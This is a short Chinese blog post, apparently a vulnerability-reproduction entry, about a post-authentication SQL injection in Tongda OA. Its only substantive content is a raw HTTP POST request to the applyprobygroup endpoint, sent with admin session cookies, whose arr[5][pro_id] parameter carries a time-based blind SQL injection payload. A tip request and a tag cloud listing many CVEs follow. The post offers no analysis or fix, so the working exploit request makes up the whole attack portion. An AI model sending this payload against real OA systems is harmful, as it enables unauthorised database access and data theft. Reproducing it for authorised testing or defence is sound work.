通达OA 后台SQL 注入

作者: print("") 分类: WEB安全,漏洞复现 发布时间: 2020-12-17 22:02 

POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
Host:
10.211.55.5
Content-Length: 39
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar
i/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin:
http://10.211.55.5
Referer:
http://10.211.55.5/general/officeProduct/product_apply/index.php
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5
; SID_1=24205621
Connection: close
arr[5][pro_id]=151';select sleep(3) %23

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

更多阅读
标签云
Apache2.4.50 Apache ShenYu APISIX APISIX Dashboard cc5 CNVD-2021-49104 CNVD-2022-60632 CobaltStrike CobaltStrike xss CommonsCollections5 Confluence CVE-2021-26084 CVE-2017-18349 CVE-2021-4034 CVE-2021-37580 CVE-2021-41277 CVE-2021-41773 cve-2021-42013 CVE-2021-43798 CVE-2021-44228 CVE-2021-45232 CVE-2021-45232 RCE CVE-2022-22954 CVE-2022-22965 CVE-2022-39197 CVE-2023-28432 Django E-Office grafana keytool store log4j2 MetaBase ONE Access python python爬虫 socks5 socks5搜索 store 证书转换成nginx VMware Workspace ONE Access ysoserial 代理池工具 宝塔面板 泛微 畅捷通 畅捷通漏洞 通达OA